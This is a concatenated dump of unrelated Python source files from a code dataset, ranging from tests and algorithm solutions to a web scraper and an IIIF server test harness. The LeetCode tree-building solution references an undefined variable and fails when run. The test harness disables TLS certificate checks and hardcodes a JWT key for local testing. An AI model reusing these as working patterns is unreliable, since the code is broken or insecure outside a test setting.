return_value=json.dumps({}))\n def test_openapi_endpoint(self, mock_get_json):\n \"\"\"Test the openapi endpoint.\"\"\"\n url = reverse('openapi')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n mock_get_json.assert_called_once()\n\n @patch('api.openapi.view.get_api_json', side_effect=get_api_json_error)\n def test_openapi_endpoint_failure(self, mock_get_json):\n \"\"\"Test the openapi endpoint.\"\"\"\n url = reverse('openapi')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n mock_get_json.assert_called_once()\n\n def test_get_api_json(self):\n \"\"\"Test the get_api_json method.\"\"\"\n test_file = NamedTemporaryFile(delete=False)\n json_data = {'foo': 'bar'}\n gzip_data = gzip.compress(json.dumps(json_data).encode())\n test_file.write(gzip_data)\n test_file.close()\n result = get_api_json(test_file.name)\n self.assertEqual(result, json_data)\n","repo_name":"werwty/koku","sub_path":"koku/api/openapi/tests_openapi.py","file_name":"tests_openapi.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"6356727328","text":"import sys\ninput = sys.stdin.readline\n\nk, n = map(int, input().split())\nlan = [int(input()) for _ in range(k)]\nstart, end = 1, max(lan)\nwhile(start <= end):\n mid = (start + end) // 2 # 자를 선 길이\n cnt = 0 # 몇 개 자를 수 있는 지\n for l in lan:\n cnt += l // mid\n if cnt < n:\n end = mid - 1\n else:\n start = mid + 1\n\nprint(end)","repo_name":"psun0610/TIL","sub_path":"Algorithm/BOJ_1654_랜선자르기.py","file_name":"BOJ_1654_랜선자르기.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"ko","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"23908659406","text":"import math\nimport random\nfrom cminer.consts import COIN\n\n\nclass MineType:\n def __init__(self, uid, hardness, probs, item_drop_probs,\n hp_base, coin_factor):\n self.uid = uid\n self.hardness = hardness\n self.probs = probs\n # [(MATERIAL_IRON, 2, 0.4), ...], <= [(id, num, prob)]\n self.item_drop_probs = item_drop_probs\n self.hp_base = hp_base\n self.coin_factor = coin_factor\n\n def prob_at_level(self, level):\n pos = math.floor(level / 100)\n return self.probs[min(pos, len(self.coin_factor) - 1)] or 0\n\n def hp_at_level(self, level):\n factor = random.uniform(0.9, 1.1)\n rv = 1.05 ** (level / 10) * self.hp_base * factor\n return int(rv)\n\n def _coin_at_level(self, level):\n pos = math.floor(level / 100)\n factor = self.coin_factor[min(pos, len(self.coin_factor) - 1)]\n rv = factor * self.hp_at_level(level)\n return int(rv)\n\n def award_at_level(self, level, lucky):\n rv = dict()\n for item in self.item_drop_probs:\n if random.random() > item[2] + lucky:\n continue\n if rv.get(item[0]):\n rv[item[0]] += item[1]\n else:\n rv[item[0]] = item[1]\n coins = self._coin_at_level(level=level)\n # 40% probability drop 10% more coin\n if random.random() < 0.4 + lucky:\n coins = int(coins * 1.1)\n rv[COIN] = coins\n return rv\n\n def new(self, level, lucky):\n return Mine(self, level, lucky)\n\n\nclass MineStatus:\n def __init__(self, hp):\n self.hp = hp\n self.hp_now = hp\n\n\nclass Mine:\n def __init__(self, model, level, lucky):\n self.model = model\n self.award = model.award_at_level(level, lucky)\n hp = model.hp_at_level(level)\n self.status = MineStatus(hp)\n\n def __repr__(self):\n from cminer.system import System\n return System.i18n(self.model.uid)\n","repo_name":"monk-studio/cminer-profiler","sub_path":"cminer/models/mine.py","file_name":"mine.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6591614982","text":"import tensorflow as tf\ntf.get_logger().setLevel('ERROR') # only show error messages\n\nfrom recommenders.models.ncf.dataset import Dataset as NCFDataset\nfrom recommenders.datasets import movielens\nfrom recommenders.datasets.python_splitters import python_chrono_split\n\n\n\n\n# top k items to recommend\nTOP_K = 10\n\n# Select MovieLens data size: 100k, 1m, 10m, or 20m\nMOVIELENS_DATA_SIZE = '100k'\n\n# Model parameters\nEPOCHS = 100\nBATCH_SIZE = 256\n\nSEED = None\n\n\ndf = movielens.load_pandas_df(\n size=MOVIELENS_DATA_SIZE,\n header=[\"userID\", \"itemID\", \"rating\", \"timestamp\"]\n)\n\ndf.head()\n\n\ntrain, test = python_chrono_split(df, 0.75)\n\ntest = test[test[\"userID\"].isin(train[\"userID\"].unique())]\ntest = test[test[\"itemID\"].isin(train[\"itemID\"].unique())]\n\n\nleave_one_out_test = test.groupby(\"userID\").last().reset_index()\n\n\ntrain_file = \"./train.csv\"\ntest_file = \"./test.csv\"\nleave_one_out_test_file = \"./leave_one_out_test.csv\"\ntrain.to_csv(train_file, index=False)\ntest.to_csv(test_file, index=False)\nleave_one_out_test.to_csv(leave_one_out_test_file, index=False)\n\ndata = NCFDataset(train_file=train_file, test_file=leave_one_out_test_file, seed=SEED, overwrite_test_file_full=True)","repo_name":"SadovnikI/Recommender_project","sub_path":"recomendation_workers/NCF/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10735710582","text":"# https://leetcode.com/problems/construct-binary-tree-from-inorder-and-postorder-traversal/\n# Given inorder and postorder traversal of a tree, construct the binary tree.\n#\n# Note:\n# You may assume that duplicates do not exist in the tree.\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def buildTree(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n self.postorder = postRight[:]\n self.inorder = inorder[:]\n root = self.InPostOrder(0, len(inorder), 0, len(postorder))\n return root\n\n def InPostOrder(self, inLeft, inRight, postLeft, postRight):\n if inLeft == inRight or postLeft == postRight:\n return None\n rootVal = self.postorder[postRight - 1]\n root = TreeNode(rootVal)\n leftSize = self.inorder.index(rootVal) - inLeft\n rightSize = (inRight - inLeft) - leftSize - 1\n root.left = self.InPostOrder(inLeft, inLeft + leftSize, postLeft, postLeft + leftSize)\n root.right = self.InPostOrder(inLeft + leftSize + 1, inRight, postLeft + leftSize, postRight - 1)\n return root\n","repo_name":"rainzhop/cumulus-tank","sub_path":"leetcode/medium/construct-binary-tree-from-inorder-and-postorder-traversal.py","file_name":"construct-binary-tree-from-inorder-and-postorder-traversal.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71654427689","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ncolorspacelist = [i for i in dir(cv2) if i.startswith('COLOR_')]\r\nprint (colorspacelist)\r\n\r\nimgsrc = cv2.imread('resource/pitrain3.png', cv2.IMREAD_UNCHANGED)\r\ngrayimg = cv2.cvtColor(imgsrc, cv2.COLOR_BGR2GRAY)\r\ncv2.imshow('unchanged', imgsrc)\r\ncv2.waitKey(0)\r\ncv2.imshow('gray', grayimg)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"JeisyLiu/Repository_Charlie","sub_path":"VariousFeatures/ComputerVision/convertColor.py","file_name":"convertColor.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7959165313","text":"import tableauserverclient as TSC\nimport csv\n\nserver_url = 'https://dub01.online.tableau.com'\nPAT_name = 'RestAPI-UserManagementScript'\nPAT_value = ''\nsite_name = 'tablonian'\ncsv_path = './users.csv'\n\nserver = TSC.Server(server_url, use_server_version=True)\ntableau_auth = TSC.PersonalAccessTokenAuth(PAT_name, PAT_value, site_name)\n\nprint(\"Collecting the list of users...\")\nwith server.auth.sign_in(tableau_auth):\n all_users, pagination_item = server.users.get()\n print(\"\\nWriting {} users to file: \".format(pagination_item.total_available))\n #debug output\n #print([[user.name,user.site_role] for user in all_users])\n\n #write data to csv\n with open(csv_path, 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['id','Username','SiteRole'])\n for user in all_users:\n writer.writerow([user.id,user.name,user.site_role])\n\nprint(\"\\nSuccess\\nEnd of script\")\n","repo_name":"TheFluffyPanda/tableau-api-helpers","sub_path":"DownloadUserInfo.py","file_name":"DownloadUserInfo.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22370186648","text":"from firebolt.client.auth import Auth\nfrom firebolt.service.manager import ResourceManager\n\n\ndef test_database_get_default_engine(\n auth: Auth,\n account_name: str,\n api_endpoint: str,\n database_name: str,\n stopped_engine_name: str,\n engine_name: str,\n):\n \"\"\"\n Checks that the default engine is either running or stopped engine\n \"\"\"\n rm = ResourceManager(\n auth=auth, account_name=account_name, api_endpoint=api_endpoint\n )\n\n db = rm.databases.get(database_name)\n\n engine = db.get_attached_engines()[0]\n assert engine is not None, \"engine is None, but shouldn't be\"\n assert engine.name in [\n stopped_engine_name,\n engine_name,\n ], \"Returned default engine name is neither of known engines\"\n\n\ndef test_databases_get_many(\n auth: Auth,\n account_name: str,\n api_endpoint: str,\n database_name: str,\n engine_name: str,\n):\n rm = ResourceManager(\n auth=auth, account_name=account_name, api_endpoint=api_endpoint\n )\n\n # get all databases, at least one should be returned\n databases = rm.databases.get_many()\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n # get all databases, with name_contains\n databases = rm.databases.get_many(name_contains=database_name)\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n # get all databases, with name_contains\n databases = rm.databases.get_many(attached_engine_name_eq=engine_name)\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n # get all databases, with name_contains\n databases = rm.databases.get_many(attached_engine_name_contains=engine_name)\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n region = [db for db in databases if db.name == database_name][0].region\n\n # get all databases, with region_eq\n databases = rm.databases.get_many(region_eq=region)\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n # get all databases, with all filters\n databases = rm.databases.get_many(\n name_contains=database_name,\n attached_engine_name_eq=engine_name,\n attached_engine_name_contains=engine_name,\n region_eq=region,\n )\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n","repo_name":"firebolt-db/firebolt-python-sdk","sub_path":"tests/integration/resource_manager/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"9289155006","text":"from django.conf import settings\nfrom main.models import Product\nfrom django.db import models\n\nclass Cart(models.Model):\n def __init__(self, req):\n self.session = req.session\n cart=self.session.get(settings.CART_SESSION_ID)\n\n if not cart:\n cart=self.session[settings.CART_SESSION_ID] = {}\n\n self.cart = cart\n\n def __iter__(self):\n for p in self.cart.keys():\n self.cart[str(p)]['product'] = Product.objects.get(id=p)\n\n for item in self.cart.values():\n item['total_price'] = int(item['product'].price * item['quantity'])\n yield item\n \n def __len__(self):\n if sum(item['quantity'] for item in self.cart.values()) >= 0:\n return sum(item['quantity'] for item in self.cart.values())\n else: return 0\n \n def save(self):\n self.session[settings.CART_SESSION_ID] = self.cart\n self.session.modified=True\n\n def add(self, product_id, quantity=1, update_quantity=False):\n product_id=product_id\n if product_id not in self.cart:\n self.cart[product_id] = {'quantity': int(quantity), 'id':product_id}\n \n if update_quantity:\n self.cart[product_id]['quantity'] += int(quantity)\n\n if self.cart[product_id]['quantity'] == 0:\n self.remove(product_id)\n\n self.save()\n\n def remove(self, product_id):\n if product_id in self.cart:\n del self.cart[product_id]\n self.save()\n\n def gettotalcost(self):\n for p in self.cart.keys():\n self.cart[str(p)]['product'] = Product.objects.get(id=p)\n cost=int(sum((item['product'].price - item['product'].sale_price) * item['quantity'] for item in self.cart.values()))\n if cost >= 0:\n return cost\n else:\n return 0\n def getquantity(self):\n for p in self.cart.keys():\n self.cart[str(p)]['product'] = Product.objects.get(id=p)\n if int(sum(item['quantity'] for item in self.cart.values())) >=0:\n return int(sum(item['quantity'] for item in self.cart.values()))\n else:\n return 0","repo_name":"yousefshady/finalprojectamit","sub_path":"ecommerce/cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42254241626","text":"from maestro_api.services.auth.request_validator import (\n AuthRequestValidator,\n UnauthorizedAccessError,\n ExpiredAccessTokenError,\n)\n\n\nclass TestRequestValidator:\n def test_validate_auth_header(self):\n auth_header = \"Bearer test_token\"\n auth_api_token = \"test_token\"\n\n re_validator = AuthRequestValidator()\n\n user = re_validator.validate_auth_header(auth_header, auth_api_token)\n\n assert dict(scope=None, email=None, uuid=\"maestro\") == user\n\n def test_validate_auth_header_with_exception(self):\n\n auth_header = \"Bearer invalid_token\"\n auth_api_token = \"test_token\"\n\n re_validator = AuthRequestValidator()\n\n try:\n re_validator.validate_auth_header(auth_header, auth_api_token)\n raise AssertionError(\"UnauthorizedAccessError should be thrown\")\n except UnauthorizedAccessError as e:\n assert {\"description\": \"Maestro Agent token is not valid\"} == e.error_msg\n\n def test_validate_tokens(self, mocker):\n access_token = \"test_access_token\"\n refresh_token = \"test_refresh_token\"\n\n class JWTAuthorizationMock:\n def validate_token(self, token):\n assert access_token == token\n\n return {\n \"scope\": \"test_scope\",\n \"email\": \"test_email\",\n \"uuid\": \"test_uuid\",\n }\n\n mocker.patch(\n \"maestro_api.services.auth.authorization.JWTAuthorization.instance\",\n return_value=JWTAuthorizationMock(),\n )\n\n re_validator = AuthRequestValidator()\n\n auth_data = re_validator.validate_tokens(access_token, refresh_token)\n\n assert {\n \"user\": dict(\n scope=\"test_scope\",\n email=\"test_email\",\n uuid=\"test_uuid\",\n ),\n \"update_tokens\": False,\n \"access_token\": access_token,\n \"refresh_token\": refresh_token,\n } == auth_data\n\n def test_validate_tokens_with_token_refresh(self, mocker):\n access_token = \"test_access_token\"\n refresh_token = \"test_refresh_token\"\n\n class OauthClientMock:\n def make_token_refresh(self, refresh_token):\n assert \"test_refresh_token\" == refresh_token\n\n return {\n \"access_token\": \"new_access_token\",\n \"refresh_token\": \"new_refresh_token\",\n }\n\n class JWTAuthorizationMock:\n called = 0\n\n def validate_token(self, token):\n self.called += 1\n if self.called == 1:\n raise ExpiredAccessTokenError(\"Token is expired\")\n elif self.called == 2:\n return {\n \"scope\": \"test_scope\",\n \"email\": \"test_email\",\n \"uuid\": \"test_uuid\",\n }\n raise AssertionError(\"should not be called more than 2 times\")\n\n mocker.patch(\n (\n \"maestro_api.services.auth.request_validator\"\n \".AuthRequestValidator.create_oauth_client\"\n ),\n return_value=OauthClientMock(),\n )\n mocker.patch(\n \"maestro_api.services.auth.authorization.JWTAuthorization.instance\",\n return_value=JWTAuthorizationMock(),\n )\n\n re_validator = AuthRequestValidator()\n\n auth_data = re_validator.validate_tokens(access_token, refresh_token)\n\n assert {\n \"user\": dict(\n scope=\"test_scope\",\n email=\"test_email\",\n uuid=\"test_uuid\",\n ),\n \"update_tokens\": True,\n \"access_token\": \"new_access_token\",\n \"refresh_token\": \"new_refresh_token\",\n } == auth_data\n\n def test_validate_tokens_with_whitelisted_email(self, mocker):\n access_token = \"test_access_token\"\n refresh_token = \"test_refresh_token\"\n\n class JWTAuthorizationMock:\n def validate_token(self, token):\n assert access_token == token\n\n return {\n \"scope\": \"test_scope\",\n \"email\": \"test_email\",\n \"uuid\": \"test_uuid\",\n }\n\n mocker.patch(\n \"maestro_api.services.auth.authorization.JWTAuthorization.instance\",\n return_value=JWTAuthorizationMock(),\n )\n\n re_validator = AuthRequestValidator()\n re_validator.emails_whitelist = [\"some_other_email\"]\n\n try:\n re_validator.validate_tokens(access_token, refresh_token)\n raise AssertionError(\"UnauthorizedAccessError should be thrown\")\n except UnauthorizedAccessError as e:\n assert {\"description\": \"User test_email doesn't have access\"} == e.error_msg\n","repo_name":"Farfetch/maestro","sub_path":"web/api/tests/services/auth/test_request_validator.py","file_name":"test_request_validator.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"18977593554","text":"#Andrew Anstaett\n#CNN Web Crawler in Python\n\nfrom bs4 import BeautifulSoup\nimport urllib2\n\n\n\ndef getSoup(url):\n\t#requests html from website\n\thtml = urllib2.urlopen(url).read()\n\t#makes it into a BeautifulSoup datatype that we can use to parse out the infomation needed\n\tsoup = BeautifulSoup(html)\n\t#returns it to 'main'\n\treturn soup\n\ndef pullArticles(soup,category):\n\t#for all the unordered lists\n\t#the categories are seperated into diffrent unordered lists, so we seperate them\n\t#and find the ones we are looking for\n\tfor ul in soup.find_all('ul'):\n\t\t#h2 is the title of the category\n\t\tfor h2 in ul.children:\n\t\t\t#we find the category we are looking for\n\t\t\tif(h2.text == category):\n\t\t\t\t#cnn uses the class 'cd__headline-text' for the headline articles titles\n\t\t\t\t#we look for all the headline titles\n\t\t\t\tfor span in ul.select(\".cd__headline-text\"):\n\t\t\t\t\t#we print the titles\n\t\t\t\t\tprint(\"\\t\" + span.text)\n\n\n\n\n#'main'\ncnn = getSoup(\"http://www.cnn.com\")\n\nprint(\"Top Stories:\")\npullArticles(cnn,\"Top Stories\")\n\nprint(\"\\n\\n\")\n\nprint(\"News and Buzz:\")\npullArticles(cnn,\"News and Buzz\")\n\nprint(\"\\n\\n\")\n\nprint(\"Sports:\")\npullArticles(cnn,\"Sports\")\n\nprint(\"\\n\\n\")\n","repo_name":"AAnstaett/PythonWebCrawler","sub_path":"WebCrawler.py","file_name":"WebCrawler.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23925399324","text":"import filecmp\nimport shlex\nimport tempfile\nfrom inspect import getmembers\nfrom typing import Any, Dict\n\nimport psutil\nimport pytest\nimport subprocess\nimport os\nimport re\nimport shutil\nimport sys\nimport threading\nimport time\nimport requests\nimport glob\n\nfrom PIL import Image, ImageChops\n\nfrom pprint import pprint\n\nfrom requests import Response\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--cserver\", action=\"store\", default=\"notset\", help=\"The absolut path to the cserver executable\"\n )\n\n\n\n@pytest.fixture(scope=\"session\")\ndef manager(request):\n cserver_exe = request.config.getoption('--cserver')\n# cserver_handlerdir = request.config.getoption('--handlerdir')\n manager = CserverProcessManager(cserver_exe)\n manager.start_cserver()\n yield manager\n manager.stop_cserver()\n manager.cleanup()\n\n\nclass CserverProcessManager:\n iiif_port: str\n iiif_ssl_port: str\n iiif_url: str\n iiif_surl: str\n iiif_imgroot: str\n iiif_route: str\n iiif_validator_command: str\n\n def __init__(self, cserver_exe: str):\n \"\"\"\n Initialize the test environment\n\n :param cserver_exe: Path to the executable\n \"\"\"\n self.iiif_port = \"8080\"\n self.iiif_ssl_port = \"8443\"\n self.iiif_url = 'http://localhost:{}'.format(self.iiif_port)\n self.iiif_surl = 'https://localhost:{}'.format(self.iiif_ssl_port)\n self.iiif_imgroot = \"./iiiftestserver/imgroot\"\n self.iiif_route = \"iiif\"\n self.iiif_validator_command = \"iiif-validate.py -s localhost:{} -p {} -i 67352ccc-d1b0-11e1-89ae-279075081939.jp2 --version=3.0 -v\".format(\n self.iiif_port, self.iiif_route)\n self.cserver_logfile = os.path.abspath(\"cserver.log\")\n self.cserver_exe = cserver_exe\n self.cserver_config = {\n# \"CSERVE_HANDLERDIR\": cserver_handlerdir,\n \"CSERVE_PORT\": self.iiif_port,\n \"CSERVE_SSLPORT\": self.iiif_ssl_port,\n \"CSERVE_INITSCRIPT\": \"./iiiftestserver/config/iiif.init.lua\",\n \"CSERVE_SSLCERT\": './iiiftestserver/certificate/certificate.pem',\n \"CSERVE_SSLKEY\": './iiiftestserver/certificate/key.pem',\n \"CSERVE_JWTKEY\": 'UP4014, the biggest steam engine',\n \"CSERVE_TMPDIR\": \"./iiiftestserver/tmp\",\n \"CSERVE_LUA_INCLUDE_PATH\": \"./iiiftestserver/scripts\",\n \"CSERVE_NTHREADS\": \"6\",\n \"CSERVE_KEEPALIVE\": \"5\",\n \"CSERVE_MAXPOST\": \"12M\",\n \"CSERVE_LOGLEVEL\": \"TRACE\",\n \"SCRIPTHANDLER_SCRIPTDIR\": \"./iiiftestserver/scripts\",\n \"SCRIPTHANDLER_ROUTES\": \"GET:/misc:misc.lua;\",\n \"FILEHANDLER_DOCROOT\": \"./iiiftestserver/docroot\",\n \"FILEHANDLER_ROUTES\": \"GET:/fileserv:C++;\"\n \"PUT:/fileserv:C++;\"\n \"POST:/fileserv:C++\",\n \"PINGHANDLER_ECHO\": \"PINGPONG\",\n \"IIIFHANDLER_IMGROOT\": self.iiif_imgroot,\n \"IIIFHANDLER_ROUTES\": \"GET:/{}:C++;\"\n \"GET:/iiifhandlervariables:iiifhandlervariables.lua;\"\n \"GET:/test_exif_gps:test_exif_gps.lua;\"\n \"POST:/upload:upload.lua;\".format(self.iiif_route),\n \"IIIFHANDLER_PREFIX_AS_PATH\": \"true\",\n \"IIIFHANDLER_IIIF_SPECIALS\": \"testit=lua_testit\"\n }\n self.compare_command = \"compare -metric {} {} {} null:\"\n self.compare_out_re = re.compile(r\"^(\\d+) \\(([0-9.]+)\\).*$\")\n self.cserver_ready = False\n self.inlines = []\n #\n # remove all files in ./tmp\n #\n for root, dirs, files in os.walk('./iiiftestserver/tmp'):\n for f in files:\n os.unlink(os.path.join(root, f))\n for d in dirs:\n shutil.rmtree(os.path.join(root, d))\n\n def cleanup(self):\n \"\"\"Cleanup files generated by the tests\"\"\"\n fileList = glob.glob(self.iiif_imgroot + '/_*')\n for filePath in fileList:\n os.remove(filePath)\n\n def start_cserver(self):\n #\n # First we stop any existing Cserver process. This could happen if a previous test run crashed.\n #\n for proc in psutil.process_iter():\n try:\n if proc.name() == \"cserver\":\n proc.terminate()\n proc.wait()\n except psutil.NoSuchProcess:\n pass\n\n # Remove any cserver log file from a previous run.\n try:\n os.remove(self.cserver_logfile)\n except OSError:\n pass\n\n #\n # let's start the subprocess with the cserver\n #\n self.cserver_process = subprocess.Popen(self.cserver_exe,\n env=self.cserver_config,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n\n def get_output() -> None:\n \"\"\"\n This local function is used to collect the output from the subprocess.\n :return: None\n \"\"\"\n while True:\n line = self.cserver_process.stdout.readline().strip(\" \\n\\r\")\n if line:\n print(line)\n if \"Cserver ready\" in line:\n self.cserver_ready = True\n self.inlines.append(line)\n else:\n return\n #\n # start the thread collecting the output of the subprocess\n #\n self.thread = threading.Thread(target=get_output)\n self.thread.daemon = True\n self.thread.start()\n #\n # wait for Cserver to be ready...\n #\n cnt = 1\n while not self.cserver_ready and cnt < 10:\n time.sleep(0.2)\n cnt += 1\n if cnt >= 20:\n raise CserverTestError(f\"Cserver did not start after {cnt*0.2} seconds\")\n else:\n print(f\"Cserver ready after {cnt*0.2} seconds\")\n\n def stop_cserver(self) -> None:\n \"\"\"\n Stop the cserver\n :return: None\n \"\"\"\n self.cserver_process.terminate()\n self.cserver_ready = False\n self.write_cserver_log()\n\n def get_server_output(self) -> str:\n return \"\".join(self.inlines)\n\n def iiif_imgroot_path(self, relative_path: str) -> str:\n \"\"\"\n Converts a path relative to data-dir into an absolute path.\n \"\"\"\n return os.path.join(self.iiif_imgroot, relative_path)\n\n def get_raw(self, *args, **kwargs) -> Response:\n largs = list(args)\n largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n nargs = tuple(largs)\n response = requests.get(*nargs, **kwargs)\n return response\n\n def get(self, *args, **kwargs):\n largs = list(args)\n largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n nargs = tuple(largs)\n\n response = \"\"\n try:\n response = requests.get(*nargs, **kwargs)\n response.raise_for_status()\n except:\n raise CserverTestError(\"GET request to {} failed: {}\".format(nargs[0], response.json()[\"message\"]))\n return response\n\n def sget(self, *args, **kwargs):\n largs = list(args)\n largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n nargs = tuple(largs)\n\n response = \"\"\n try:\n response = requests.get(*nargs, **kwargs, verify=False)\n response.raise_for_status()\n except:\n raise CserverTestError(\"GET request to {} failed: {}\".format(nargs[0], response.json()[\"message\"]))\n return response\n\n def get_json(self, *args, **kwargs):\n largs = list(args)\n largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n nargs = tuple(largs)\n try:\n response = requests.get(*nargs, **kwargs)\n response.raise_for_status()\n except:\n raise CserverTestError(\"GET request to {} failed: {}\".format(nargs[0], response.json()[\"message\"]))\n return response.json()\n\n def sget_json(self, *args, **kwargs):\n largs = list(args)\n largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n nargs = tuple(largs)\n try:\n response = requests.get(*nargs, **kwargs, verify=False)\n response.raise_for_status()\n except:\n raise CserverTestError(\"GET request to {} failed: {}\".format(nargs[0], response.json()[\"message\"]))\n return response.json()\n\n def get_status_code(self, *args, **kwargs) -> int:\n largs = list(args)\n largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n nargs = tuple(largs)\n\n response = requests.get(*nargs, **kwargs)\n return response.status_code\n\n def get_route(self, route: str, headers: Dict[str,str] = None):\n route = 'http://localhost:8080/' + route\n response = requests.get(route, headers=headers)\n return response.status_code\n\n def get_route_json(self, route: str, headers: Dict[str,str] = None):\n route = 'http://localhost:8080/' + route\n try:\n response = requests.get(route, headers=headers)\n response.raise_for_status()\n except:\n raise CserverTestError(\"GET request to {} failed: {}\".format(route, response.json()[\"message\"]))\n return response.json()\n\n def download_file(self, iiifpath: str, suffix: str = None, headers=None) -> str:\n url = \"/\".join([self.iiif_url, self.iiif_route, iiifpath])\n response = requests.get(url, headers=headers, stream=True)\n response.raise_for_status()\n temp_fd, temp_file_path = tempfile.mkstemp(suffix=suffix)\n temp_file = os.fdopen(temp_fd, mode=\"wb\")\n\n for chunk in response.iter_content(chunk_size=8192):\n temp_file.write(chunk)\n\n temp_file.close()\n return temp_file_path\n\n def compare_iiif_bytes(self, iiifpath: str, referencepath: str, headers=None) -> bool:\n expected_file_basename, expected_file_extension = os.path.splitext(referencepath)\n downloaded_file_path = self.download_file(iiifpath, headers=headers, suffix=expected_file_extension)\n if filecmp.cmp(downloaded_file_path, referencepath):\n os.remove(downloaded_file_path)\n return True\n else:\n return False\n\n def compare_iiif_images(self, iiifpath: str, referencepath: str, headers=None) -> bool:\n expected_file_basename, expected_file_extension = os.path.splitext(referencepath)\n downloaded_file_path = self.download_file(iiifpath, headers=headers, suffix=expected_file_extension)\n\n im1 = Image.open(referencepath)\n im2 = Image.open(downloaded_file_path)\n diff = ImageChops.difference(im1, im2)\n if diff.getbbox():\n return False\n else:\n return True\n # compare_process_args = shlex.split(\n # self.compare_command.format(metric, referencepath, downloaded_file_path))\n # compare_process = subprocess.run(compare_process_args,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.STDOUT,\n # universal_newlines=True)\n #\n #\n # compare_out_str = compare_process.stdout\n # compare_out_regex_match = self.compare_out_re.match(compare_out_str)\n # assert compare_out_regex_match is not None, \"Couldn't parse comparison result: {}\".format(compare_out_str)\n # return int(compare_out_regex_match.group(1))\n\n\n def upload(self, route: str, filepath: str, mimetype: str, data: Dict = None) -> Any:\n response = {}\n basename = os.path.basename(filepath)\n files = {'file': (basename, open(filepath, 'rb'), mimetype)}\n route = 'http://localhost:8080/' + route\n try:\n response = requests.post(route, data=data, files=files)\n response.raise_for_status()\n except:\n raise CserverTestError(\"POST request to {} failed: {}\".format(route, response.json()[\"message\"]))\n return response.json()\n\n def get_image_info(self, url_path, headers=None):\n \"\"\"\n Downloads a temporary image file, gets information about it using ImageMagick's 'identify'\n program with the '-verbose' option, and returns the resulting output.\n\n url_path: a path that will be appended to the Sipi base URL to make the request.\n headers: an optional dictionary of request headers.\n \"\"\"\n\n downloaded_file_path = self.download_file(url_path, headers=headers)\n info_process_args = shlex.split(\"identify -verbose {}\".format(downloaded_file_path))\n info_process = subprocess.run(info_process_args,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n return info_process.stdout\n\n def run_iiif_validator(self):\n \"\"\"Runs the IIIF validator. If validation fails, writes IIFHandler's output to cserve.log and raises an exception.\"\"\"\n\n validator_process_args = shlex.split(self.iiif_validator_command)\n validator_process = subprocess.run(validator_process_args,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n\n if validator_process.returncode != 0:\n raise CserverTestError(\n \"IIIF validation failed:\\n{}\".format(validator_process.stdout))\n\n\n def write_cserver_log(self) -> None:\n \"\"\"Writes cserver output to a log file.\"\"\"\n with open(self.cserver_logfile, \"w\") as file:\n file.write(self.get_server_output())\n\nclass CserverTestError(Exception):\n \"\"\"Indicates an error in a Sipi test.\"\"\"\n def __init__(self, *args):\n super(CserverTestError, self).__init__(args)\n\ndef pytest_itemcollected(item):\n \"\"\"Outputs test class and function docstrings, if provided, when each test is run.\"\"\"\n\n par = item.parent.obj\n node = item.obj\n pref = par.__doc__.strip() if par.__doc__ else par.__class__.__name__\n component = par.component\n suf = node.__doc__.strip() if node.__doc__ else node.__name__\n if pref or suf:\n item._nodeid = \"TEST: {}: {} should {}\\n\".format(pref, component, 